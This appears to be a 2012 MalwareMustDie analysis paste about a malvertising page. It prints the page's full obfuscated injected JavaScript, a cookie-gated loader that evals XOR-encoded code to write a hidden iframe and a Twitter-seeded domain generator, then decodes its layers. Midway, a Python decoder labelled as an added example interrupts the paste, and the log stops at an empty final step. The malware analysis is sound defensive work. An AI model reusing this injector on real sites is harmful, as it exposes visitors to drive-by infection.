MalwareMustDie

#MalwareMustDie! New PseudoRND/DGA Not RunForrest

Nov 11th, 2012
=====================================
#MalwareMustDie - Other PseudoRandom Generator
@unixfreaxjp ~]$ date
Mon Nov 12 02:01:17 JST 2012
Below is the log and necessary data...
Deeper de-obfuscation is in progress
=======================================

// I ran into an interesting malvertisement spam, which led me to this URL:

h00p://sminkes.jatekokingyen.com/index.php?id=39&task=view

// tor'ing

--2012-11-12 01:22:09-- h00p://sminkes.jatekokingyen.com/index.php?id=39&task=view
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
Proxy request sent, awaiting response... 200 OK
---response begin---
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2012 16:27:44 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0d mod_fcgid/2.3.6 mod_auth_pgsql/2.0.3
X-Powered-By: PHP/4.4.9
Set-Cookie: ava_plays=1; expires=Tue, 19 Feb 2013 16:27:44 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
Length: unspecified [text/html]
Saving to: `index.php?id=39&task=view.1'
2012-11-12 01:22:14 (16.5 KB/s) - `index.php?id=39&task=view.1' saved [34282]

// host is in here....
$ host -ta sminkes.jatekokingyen.com
sminkes.jatekokingyen.com has address 213.229.112.103

$ crackip 213.229.112.103

// ASN|Prefix|ASName|CN|Domain|ISP of an IP Address
29550 | 213.229.64.0/18 | SIMPLYTRANSIT | UK | 3V0.NET | SIMPLY TRANSIT LTD

// I checked in VT & found 2 (two) references; the one below is my sample..
// looks like it is the same sample with a different MD5

MD5: 0895e3556e6e6b57a0750feaa8871f99
File size: 33.5 KB ( 34282 bytes )
File name: output.3267650.txt
File type: HTML
Tags: html
Detection ratio: 29 / 44
Analysis date: 2012-11-11 13:25:33 UTC
https://www.virustotal.com/file/d9502a3d387fe24371f4b6a159d3d207f96cbbd9d414f35902848fd9f522c853/analysis/

MD5: 29da2c546276e0e92bf9b001c90a63b4
File size: 33.5 KB ( 34273 bytes )
File name: index.html
File type: HTML
Detection ratio: 29 / 44
Analysis date: 2012-11-11 16:25:21 UTC
https://www.virustotal.com/file/ffb36224bd5ef8dc7cb5be9f4430f571cd2f7e5f3914f14b45be05af0f7606c5/analysis/1352651121/



// let's check whether there is any malc0de inside or not...

$ checkbadcode index.html

blah...blah..
:
<script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dstZ253bdZ2563Z2573Z2528Z2564Z2561+Z2564Z2562Z252bdZ2563+Z2564Z2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z2577(Z2573Z2574Z2529Z253bsZ2574Z253d$Z2561Z253bZ2522;Z22;caZ3dZ22Z2566uZ256ectZ2569Z256fnZ2520dZ2563Z2573Z2528dsZ252cesZ2529Z257bdsZ253dunZ2565sZ25Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ccZ3dZ22.leZ256egthZ253biZ252bZ252bZ2529Z257btmpZ253dds.Z2573licZ2565(i,Z2569+Z2531)Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;czZ3dZ22Z2566uncZ2574Z2569Z256fZ256e 
cZ257aZ2528Z2563z)Z257brZ2565turZ256eZ2520ca+Z2563b+cZ2563+cdZ252bcZ2565+Z2563z;Z257d;Z22;cbZ3dZ2263Z2561pe(Z2564s);Z2573tZ253dtZ256dZ2570Z253dZ2527Z2527;for(iZ253d0;iZ253cdsZ22;opZ3dZ22Z2524aZ253dZ2522dw(dcsZ2528Z2563u,1Z2534));Z2522;Z22;cdZ3dZ22Z253bZ2573Z2574Z253dst+SZ2574riZ256eg.Z2566rZ256fmCZ2568arCZ256fdZ2565((Z2574mZ22;dzZ3dZ22Z2566unZ2563tiZ256fnZ2520dZ2577(Z2574)Z257bcaZ253dZ2527Z252564ocuZ25256dZ2565nZ25257Z2534.Z252577Z2572iZ2525Z25374eZ2528Z25252Z2532Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253Z2563Z2573Z252563Z2572Z2569pZ252574 Z25256cZ252561Z25256eZ252567uaZ2567Z252565Z25253dZ25255cZ252522jZ2561Z2576aZ2573Z2563rZ252569pZ25257Z2534Z25255cZ25252Z2532Z2525Z2533eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ2570Z252574Z25253eZ2527;evalZ2528unZ2565Z2573capZ2565(tZ2529)};Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ceZ3dZ22pZ252ecZ2568arZ2543odZ2565At(Z2530)^(Z25270xZ25300Z2527+esZ2529)Z2529;}Z257dZ22;Z69f 
Z28docZ75Z6dZ65Z6etZ2ecoZ6fkZ69Z65.inZ64eZ78OZ66(Z27rf5Z66Z36Z64sZ27)Z3dZ3d-1)Z7bfunctioZ6e Z63aZ6cZ6cbaZ63kZ28xZ29Z7bwindZ6fw.Z74w Z3dZ20xZ3bZ76aZ72 Z64Z20Z3d nZ65wZ20DaZ74eZ28Z29;d.Z73Z65Z74TZ69me(Z78[Z22as_oZ66Z22]*1Z3000)Z3bvZ61r Z68Z20Z3d Z64.geZ74UTCZ48oZ75rs(Z29;wZ69nZ64ow.Z68 Z3d h;ifZ20(hZ20Z3e 8)Z7bd.setUZ54CDaZ74eZ28d.Z67eZ74UTZ43DaZ74Z65(Z29Z20Z2dZ202);Z7delsZ65Z7bd.sZ65tZ55TZ43Z44atZ65(d.Z67eZ74UTCZ44Z61te(Z29 - Z33);}Z77iZ6edoZ77.gZ64 Z3d d;Z76ar Z74imeZ20Z3d nZ65w AZ72rZ61Z79()Z3bvZ61r Z73hiZ66tIZ6edeZ78Z20Z3d Z22Z22;timZ65[Z22yearZ22] Z3d dZ2egZ65Z74Z55TCFZ75llYZ65aZ72Z28)Z3btimZ65[Z22montZ68Z22] Z3d d.Z67etZ55TCMZ6fntZ68()+Z31;tZ69mZ65Z5bZ22dZ61Z79Z22] Z3d d.Z67Z65Z74UZ54CDZ61te(Z29;iZ66 (dZ2eZ67Z65tZ55TZ43MonZ74h()Z2bZ31 Z3c 1Z30)Z7bshZ69Z66tZ49nZ64ex Z3dZ20tiZ6deZ5bZ22yearZ22] Z2b Z22Z2d0Z22Z20+ (Z64.gZ65tZ55Z54CMoZ6eZ74h()Z2b1)Z3b}eZ6csZ65Z7bsZ68iftZ49ndeZ78 Z3d Z74imZ65[Z22yeaZ72Z22] Z2b Z22-Z22 + (Z64Z2eZ67Z65Z74UTCZ4dontZ68(Z29Z2b1);Z7diZ66 (dZ2egetZ55TCZ44Z61tZ65Z28Z29 Z3c 10Z29Z7bshiZ66tZ49ndZ65xZ20Z3dshiZ66Z74InZ64exZ20+ Z22-0Z22 +Z20d.Z67eZ74UZ54CZ44ateZ28Z29;}eZ6cseZ7bZ73hiZ66tZ49ndZ65x Z3d Z73hifZ74IZ6eZ64ex Z2b Z22Z2dZ22 + dZ2eZ67eZ74Z55TZ43DatZ65();Z7dZ64ocuZ6denZ74.wrZ69Z74Z65(Z22Z3cscrZ22+Z22iptZ20laZ6eguaZ67eZ3djavasZ63ripZ74Z22+Z22 srcZ3dZ27hZ74Z74pZ3aZ2fZ2fsearZ63h.Z74witZ74erZ2ecoZ6dZ2ftrZ65ndZ73Z2fdailyZ2eZ6aZ73Z6fn?Z64Z61Z74eZ3dZ22+ shiZ66Z74IndZ65x+Z22&cZ61lZ6cbZ61cZ6bZ3dZ63alZ6cZ62acZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fuZ6ectZ69oZ6e caZ6clbZ61ck2Z28x)Z7bwiZ6eZ64owZ2etZ77Z20Z3d xZ3bsZ63Z28Z27rf5Z666dZ73Z27,Z32,7)Z3bevZ61lZ28uneZ73capZ65Z28Z64z+Z63Z7aZ2bopZ2bsZ74)+Z27dw(Z64zZ2bZ63Z7a($aZ2bst)Z29;Z27);doZ63Z75meZ6etZ2ewriZ74e(Z24a)Z3bZ7ddZ6fcuZ6dZ65ntZ2eZ77Z72Z69te(Z22Z3cimgZ20Z73rZ63Z3dZ27http:Z2fZ2fsearchZ2etZ77iZ74tZ65rZ2ecoZ6dZ2fZ69mZ61gesZ2fseZ61rchZ2frZ73s.pZ6egZ27 wZ69Z64thZ3d1Z20heZ69gZ68tZ3d1 sZ74ylZ65Z3dZ27visiZ62Z69liZ74Z79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt 
Z6cZ61nZ67uaZ67eZ3djZ61vZ61Z73cZ72iptZ22+Z22 srcZ3dZ27httpZ3aZ2fZ2fZ73eZ61rZ63h.Z74witZ74er.Z63oZ6dZ2ftrenZ64sZ2fZ64aZ69ly.Z6asonZ3fZ63alZ6cbaZ63kZ3dcZ61llZ62aZ63kZ27Z3eZ22 + Z22Z3cZ2fsZ63rZ22 + Z22ipZ74Z3eZ22)Z3bZ7dZ65lseZ7bZ24aZ3dZ27Z27};functZ69Z6fn sZ63(cnZ6d,vZ2cedZ29Z7bvaZ72 Z65Z78dZ3dnZ65w Z44atZ65Z28);eZ78Z64.Z73Z65tZ44ateZ28exdZ2egeZ74DaZ74Z65()Z2bZ65d)Z3bdZ6fcumZ65ntZ2ecooZ6bieZ3dcZ6emZ2bZ20Z27Z3dZ27 +escaZ70e(Z76)Z2bZ27;Z65xpZ69Z72Z65Z73Z3dZ27+exd.tZ6fGZ4dZ54StrZ69Z6eZ67()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>

// ↑ so we got 2 (two) injected copies of the same malcode.., what is this? ↓

// decode it; using Malzilla for this is enough. Below is the decoded script; the upper part is
// the variables dz, cz, op, st

st = "
%73t%3d%22%24%61%3dst%3bd%63%73%28%64%61+%64%62%2bd%63+%64%64+%64e%2c%31%30%29;%64%77(%73%
74%29%3bs%74%3d$%61%3b%22;";
ca = "%66u%6ect%69%6fn%20d%63%73%28ds%2ces%29%7bds%3dun%65s%";
da = "
fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7
Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcK
yMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%
7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~
tcKyMK$M>aeubi>sxqbS%";
dc = "
rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<0
7wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7
<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0
~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~
tuh9kbudeb~0888iuqb0;";
cc = ".le%6egth%3bi%2b%2b%29%7btmp%3dds.%73lic%65(i,%69+%31)";
de = "
209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK8
8dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddu
bcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4
q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0
=0!M0;07>s%7F}79+m";
cz = "%66unc%74%69%6f%6e c%7a%28%63z)%7br%65tur%6e%20ca+%63b+c%63+cd%2bc%65+%63z;%7d;";
cb = "63%61pe(%64s);%73t%3dt%6d%70%3d%27%27;for(i%3d0;i%3cds";
op = "%24a%3d%22dw(dcs%28%63u,1%34));%22;";
cd = "%3b%73%74%3dst+S%74ri%6eg.%66r%6fmC%68arC%6fd%65((%74m";
dz = "
%66un%63ti%6fn%20d%77(%74)%7bca%3d%27%2564ocu%256d%65n%257%34.%2577%72i%25%374e%28%252%32%
27;c%65%3d%27%2522)%27;cb%3d%27%253%63%73%2563%72%69p%2574 %256c%2561%256e%2567ua%67%2565%
253d%255c%2522j%61%76a%73%63r%2569p%257%34%255c%252%32%25%33e%27;cc%3d%27%253c%255c%252fsc
%72i%70%2574%253e%27;eval%28un%65%73cap%65(t%29)};";
dd = "
08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqi
Sx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~t
uh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}u
K7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##
!!90..0#90;0~e}9050!%";
db = "
7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcx
yvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26
M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>w
udEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>
wudEDSTqdu89+fqb0t-7v";
cu = "
(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;s{xpyz;64c}p`|)%$$4|q}s|
`),$*(;}rfuyq*(;p}b*";
ce = "p%2ec%68ar%43od%65At(%30)^(%270x%300%27+es%29)%29;}%7d";
if (document.cookie.indexOf('rf5f6ds') == -1){
function callback(x){
window.tw = x;
var d = new Date();
d.setTime(x["as_of"] * 1000);
var h = d.getUTCHours();
window.h = h;
if (h > 8){
d.setUTCDate(d.getUTCDate() - 2);
}
else {
d.setUTCDate(d.getUTCDate() - 3);
}
window.gd = d;
var time = new Array();
var shiftIndex = "";
time["year"] = d.getUTCFullYear();
time["month"] = d.getUTCMonth() + 1;
time["day"] = d.getUTCDate();
if (d.getUTCMonth() + 1 < 10){
shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
}
else {
shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
}
if (d.getUTCDate() < 10){
shiftIndex = shiftIndex + "-0" + d.getUTCDate();
}
else {
shiftIndex = shiftIndex + "-" + d.getUTCDate();
}
document.write("<scr" + "ipt language=javascript" +
" src='http://search.twitter.com/trends/daily.json?date=" + shiftIndex +
"&callback=callback2'>" + "</scr" + "ipt>");
}
function callback2(x){
window.tw = x;
sc('rf5f6ds', 2, 7);
eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
document.write($a);
}
document.write("
<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibil
ity:hidden' /> <scr" + "ipt language=javascript" +
" src='http://search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" +
"ipt>");
}
else {
$a = ''
}
;
function sc(cnm, v, ed){
var exd = new Date();
exd.setDate(exd.getDate() + ed);
document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
};

// there are three possibilities here; the last one goes to Twitter
// with the default access, without cookies...

<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style=
'visibility:hidden' /> <script language=javascript src=
'http://search.twitter.com/trends/daily.json?callback=callback'></script>


// then the above one also goes to Twitter with the same pattern..

<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibil
ity:hidden' /> <script language=javascript src=
'http://search.twitter.com/trends/daily.json?date=COOKIEBASEDATE&callback=callback'></script>


// but it also has the deobfuscated ones, as follows... this is the POINT!....
// I decoded it as below....


// Let's put these string operations together and see where they lead us...

st = "%73t%3d%22%24%61%3dst%3bd%63%73%28%64%61+%64%62%2bd%63+%64%64+%64e%2c%31%30%29;%64%77(%73%74%29%3bs%74%3d$%61%3b%22;";
ca = "%66u%6ect%69%6fn%20d%63%73%28ds%2ces%29%7bds%3dun%65s%";
da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
cc = ".le%6egth%3bi%2b%2b%29%7btmp%3dds.%73lic%65(i,%69+%31)";
de = "209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";
cz = "%66unc%74%69%6f%6e c%7a%28%63z)%7br%65tur%6e%20ca+%63b+c%63+cd%2bc%65+%63z;%7d;";
cb = "63%61pe(%64s);%73t%3dt%6d%70%3d%27%27;for(i%3d0;i%3cds";
op = "%24a%3d%22dw(dcs%28%63u,1%34));%22;";
cd = "%3b%73%74%3dst+S%74ri%6eg.%66r%6fmC%68arC%6fd%65((%74m";
dz = "%66un%63ti%6fn%20d%77(%74)%7bca%3d%27%2564ocu%256d%65n%257%34.%2577%72i%25%374e%28%252%32%27;c%65%3d%27%2522)%27;cb%3d%27%253%63%73%2563%72%69p%2574 %256c%2561%256e%2567ua%67%2565%253d%255c%2522j%61%76a%73%63r%2569p%257%34%255c%252%32%25%33e%27;cc%3d%27%253c%255c%252fsc%72i%70%2574%253e%27;eval%28un%65%73cap%65(t%29)};";
dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%";
db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;s{xpyz;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
ce = "p%2ec%68ar%43od%65At(%30)^(%270x%300%27+es%29)%29;}%7d";

// ok then let's kidnap their evil formula....

eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
document.write($a);


// run it here and see how the eval sets come up...

first eval() =
function dw(t){ca='%64ocu%6den%74.%77ri%74e(%22';ce='%22)';cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';cc='%3c%5c%2fscrip%74%3e';eval(unescape(t))};function dcs(ds,es){ds=unescape(ds);st=tmp='';for(i=0;i<ds.length;i++){tmp=ds.slice(i,i+1);st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));}}dw(dcs(cu,14));$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;
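The first eval shows the three decoding layers the sample stacks: z() turns 'Z' back into '%', unescape() expands the %XX escapes, and dcs() XORs every character with a key that, because '0x00'+es is string concatenation in JavaScript, is 0x14 for es=14 and 0x10 for es=10. The Python below re-implements those layers as an added example (it is not the sample's own code and not part of the original paste); its two inputs are copied from the variables above, cu in full and the opening of da:

```python
"""Added example: the decoding layers used by the sample above.
z() swaps 'Z' for '%' and unescapes; dcs() unescapes again and XORs every
character with a key built from the string '0x00' + es."""
from urllib.parse import unquote


def js_unescape(s):
    # JS unescape() maps %XX straight to code unit XX, so decode as latin-1;
    # invalid sequences such as '%$$' are left untouched, as in JS
    return unquote(s, encoding='latin-1')


def z(s):
    """The sample's z(): 'Z' is the stand-in for '%', then unescape()."""
    return js_unescape(s.replace('Z', '%'))


def dcs_key(es):
    """('0x00' + es) in JS is string concatenation, not addition:
    es=14 gives '0x0014' -> 20 and es=10 gives '0x0010' -> 16."""
    return int('0x00' + str(es), 16)


def dcs(ds, es):
    """The sample's dcs(): unescape, then XOR each char code with the key."""
    key = dcs_key(es)
    return ''.join(chr(ord(c) ^ key) for c in js_unescape(ds))


# copied from the sample's variable 'cu' (the script decodes it with es=14)
CU = ("(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;"
      "s{xpyz;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*")
# the opening of the sample's variable 'da' (da+db+dc+dd+de is decoded with es=10)
DA_PREFIX = "fqb0t-7vrs}vyb>s%7F}7+"


def decode_sample():
    """Return the two plaintexts the script builds before it writes them."""
    return {
        'hidden_iframe': dcs(CU, 14),
        'dga_start': dcs(DA_PREFIX, 10),
    }


if __name__ == '__main__':
    for name, text in decode_sample().items():
        print(name, '->', text)
```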

second eval() =
"undefined" // so be it... :-))

third eval() =
function dw(t){ca='%64ocu%6den%74.%77ri%74e(%22';ce='%22)';cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';cc='%3c%5c%2fscrip%74%3e';eval(unescape(t))};function cz(cz){return ca+cb+cc+cd+ce+cz;};$a="dw(dcs(cu,14));";st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";dw(dz+cz($a+st));

fourth eval() =
